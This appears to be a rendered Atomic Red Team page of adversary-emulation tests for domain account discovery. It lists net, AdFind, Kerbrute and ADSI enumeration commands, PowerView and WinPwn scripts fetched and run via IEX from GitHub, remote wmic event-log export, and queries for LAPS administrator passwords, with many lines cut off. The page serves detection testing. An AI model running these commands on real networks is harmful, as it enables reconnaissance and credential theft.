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853 lines (409 loc) • 23 KB

T1087.002 - Account Discovery: Domain Account

Description from ATT&CK

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as `net user /domain` and `net group /domain` of the [Net](#) utility, `dscacheutil -q group` on macOS, and `ldapsearch` on Linux can list domain users and groups. [PowerShell](#) cmdlets including `Get-ADUser` and `Get-ADGroupMember` may enumerate members of Active Directory groups.

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Atomic Test #1 - Enumerate all accounts (Domain)

Enumerate all accounts Upon exeuction, multiple enumeration commands will be run and their output displayed in the PowerShell session

Supported Platforms: Windows

auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e

Attack Commands: Run with **command_prompt** !

```
net user /domain  
net group /domain
```



Atomic Test #2 - Enumerate all accounts via PowerShell (Domain)

Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.

Supported Platforms: Windows

auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2

Attack Commands: Run with **powershell** !

```
net user /domain  
get-localgroupmember -group Users  
get-aduser -filter *
```



Atomic Test #3 - Enumerate logged on users via CMD (Domain)

Enumerate logged on users. Upon exeuction, logged on users will be displayed.

Supported Platforms: Windows

auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7

Inputs:

Name	Description	Type	Default Value
computer_name	Name of remote system to query	string	%COMPUTERNAME%

Attack Commands: Run with **command_prompt** !

```
query user /SERVER:#{computer_name}
```



Atomic Test #4 - Automated AD Recon (ADRecon)

ADRecon extracts and combines information about an AD environment into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.

Supported Platforms: Windows

auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59

Inputs:

Name	Description	Type	Default Value
adrecon_path	Path of ADRecon.ps1 file	path	PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1

Attack Commands: Run with **powershell** !

```
Invoke-Expression #{adrecon_path}
```



Cleanup Commands:

```
Get-ChildItem PathToAtomicsFolder\..\ExternalPayloads -Recurse -Force | Where{$_.Ni
```

Dependencies: Run with **powershell** !

Description: ADRecon must exist on disk at specified location ({adrecon_path})

Check Prereq Commands:

```
if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}
```

Get Prereq Commands:

```
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction I  
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon
```

Atomic Test #5 - Adfind -Listing password policy

Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference-

<http://www.joeware.net/freetools/tools/adfind/>,

<https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx>

Supported Platforms: Windows

auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600


Attack Commands: Run with **command_prompt** !

```
PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -default -s base lockoutduration
```

Dependencies: Run with **powershell** !

Description: AdFind.exe must exist on disk at specified location
(PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)

Check Prereq Commands:

```
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe) {exit 0} else {e: 
```

Get Prereq Commands:

```
New-Item -Type Directory (split-path PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -Path)
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects" -OutFile PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe
```


Atomic Test #6 - Adfind - Enumerate Active Directory Admins

Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- <http://www.joeware.net/freetools/tools/adfind/>, <https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/>

Supported Platforms: Windows

auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a


Attack Commands: Run with **command_prompt** !

```
PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -sc admincountdmp 
```

Dependencies: Run with **powershell** !

Description: AdFind.exe must exist on disk at specified location
(PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)

Check Prereq Commands:

```
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe) {exit 0} else {e: 
```

Preview

Code

Blame

Raw



```
New-Item -Type Directory (split-path PathToAtomicsFolder\..\ExternalPayloads\AdFind  
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/;
```

Atomic Test #7 - Adfind - Enumerate Active Directory User Objects

Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference-

<http://www.joeware.net/freetools/tools/adfind/>, <https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html>

Supported Platforms: Windows

auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7

Attack Commands: Run with **command_prompt** !

```
PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -f (objectcategory=person)
```

Dependencies: Run with **powershell** !

Description: AdFind.exe must exist on disk at specified location
(PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)

Check Prereq Commands:

```
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe) {exit 0} else {e
```

Get Prereq Commands:

```
New-Item -Type Directory (split-path PathToAtomicsFolder\..\ExternalPayloads\AdFind  
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/;
```

Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects

Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- <http://www.joeware.net/freetools/tools/adfind/>, <https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html>

Supported Platforms: Windows

auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99

Attack Commands: Run with **command_prompt** !

```
PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -sc exchaddresses
```



Dependencies: Run with **powershell** !

Description: AdFind.exe must exist on disk at specified location
(PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)

Check Prereq Commands:

```
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe) {exit 0} else {e
```



Get Prereq Commands:

```
New-Item -Type Directory (split-path PathToAtomicsFolder\..\ExternalPayloads\AdFind  
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/i
```



Atomic Test #9 - Enumerate Default Domain Admin Details (Domain)

This test will enumerate the details of the built-in domain admin account

Supported Platforms: Windows

auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef

Attack Commands: Run with `command_prompt` !

```
net user administrator /domain
```



Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation

Attackers may attempt to query for computer objects with the UserAccountControl property

'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information -

<https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce> Prerequisite: AD RSAT PowerShell module is needed and it must run under a

domain user

Supported Platforms: Windows

auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b

Inputs:

Name	Description	Type	Default Value
domain	Domain FQDN	string	\$env:UserDnsDomain
uac_prop	UAC Property to search	integer	524288

Attack Commands: Run with `powershell` !

```
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})
```



Dependencies: Run with **powershell!**

Description: PowerShell ActiveDirectory Module must be installed

Check Prereq Commands:

```
Try {  
    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null  
    exit 0  
}  
Catch {  
    exit 1  
}
```



Get Prereq Commands:

```
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {  
    Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS  
} else {  
    Install-WindowsFeature RSAT-AD-PowerShell  
}
```



Atomic Test #11 - Get-DomainUser with PowerView

Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.

Supported Platforms: Windows

auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2

Attack Commands: Run with **powershell!**

```
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12  
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Rec
```



Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher

The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:

<https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/>

Supported Platforms: Windows

auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3

Attack Commands: Run with **powershell** !

```
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=us
```



Atomic Test #13 - Enumerate Linked Policies In ADSISearcher Discovery

The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:

<https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81>

Supported Platforms: Windows

auto_generated_guid: 7ab0205a-34e4-4a44-9b04-e1541d1a57be

Attack Commands: Run with **powershell** !

```
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$").gPLink){Write-Host "[+] D
```

Atomic Test #14 - Enumerate Root Domain linked policies Discovery

The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: <https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81>

Supported Platforms: Windows

auto_generated_guid: 00c652e2-0750-4ca6-82ff-0204684a6fe4

Attack Commands: Run with **powershell** !

```
(([adsisearcher]''').SearchRoot).Path | %{if(([ADSI]"$").gPLink){Write-Host "[+] D
```

Atomic Test #15 - WinPwn - generaldomaininfo

Gathers general domain information using the generaldomaininfo function of WinPwn

Supported Platforms: Windows

auto_generated_guid: ce483c35-c74b-45a7-a670-631d1e69db3d

Attack Commands: Run with **powershell** !

```
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'  
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3
```

```
generaldomaininfo -noninteractive -consoleoutput
```

Atomic Test #16 - Kerbrute - userenum

Enumerates active directory usernames using the userenum function of Kerbrute

Supported Platforms: Windows

auto_generated_guid: f450461c-18d1-4452-9f0d-2c42c3f08624

Inputs:

Name	Description	Type	Default Value
Domain	Domain that is being tested against	string	\$env:USERDOMAIN
DomainController	Domain Controller that is being tested against	string	\$env:UserDnsDomain

Attack Commands: Run with **powershell** !

```
cd PathToAtomicsFolder\..\ExternalPayloads
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} PathToAtomicsFolder\
```



Dependencies: Run with **powershell** !

Description: kerbrute.exe must exist in PathToAtomicsFolder..\ExternalPayloads.

Check Prereq Commands:

```
if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {
```



Get Prereq Commands:

```
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerl
```



Description: username text file must exist in PathToAtomicsFolder.\ExternalPayloads.

Check Prereq Commands:

```
if (test-path PathToAtomicsFolder\..\ExternalPayloads\username.txt){exit 0} else {
```

Get Prereq Commands:

```
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atom:
```

Atomic Test #17 - Wevtutil - Discover NTLM Users Remote

This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the output in C:\temp. [Reference](#)

Supported Platforms: Windows

auto_generated_guid: b8a563d4-a836-4993-a74e-0a19b8481bfe

Attack Commands: Run with powershell !

```
$target = $env:LOGONSERVER  
$target = $target.Trim("\\")  
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString  
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers
```

Cleanup Commands:

```
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
```

Atomic Test #18 - Suspicious LAPS Attributes Query with Get-ADComputer all properties

This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: 394012d9-2164-4d4f-b9e5-acf30ba933fe

Inputs:

Name	Description	Type	Default Value
hostname	Name of the host	string	\$env:computername

Attack Commands: Run with powershell !

```
Get-ADComputer #{hostname} -Properties *
```

Atomic Test #19 - Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property

This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: 6e85bdf9-7bc4-4259-ac0f-f0cb39964443

Inputs:

Name	Description	Type	Default Value
hostname	Name of the host	string	\$env:computername

Attack Commands: Run with **powershell** !

```
Get-ADComputer ${hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
```



Atomic Test #20 - Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope

This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: ffbcfd62-15d6-4989-a21a-80bfc8e58bb5

Attack Commands: Run with **powershell** !

```
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
```



Atomic Test #21 - Suspicious LAPS Attributes Query with adfind all properties

This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: abf00f6c-9983-4d9a-afbc-6b1c6c6448e1

Inputs:

Name	Description	Type	Default Value
domain	Domain of the host	string	\$env:USERDOMAIN

Attack Commands: Run with powershell !

```
PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -h #{domain} -s subtree -f "obji
```

Atomic Test #22 - Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd

This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: 51a98f96-0269-4e09-a10f-e307779a8b05

Inputs:

Name	Description	Type	Default Value
domain	Domain of the host	string	\$env:USERDOMAIN

Attack Commands: Run with powershell !

```
PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -h #{domain} -s subtree -f "obji
```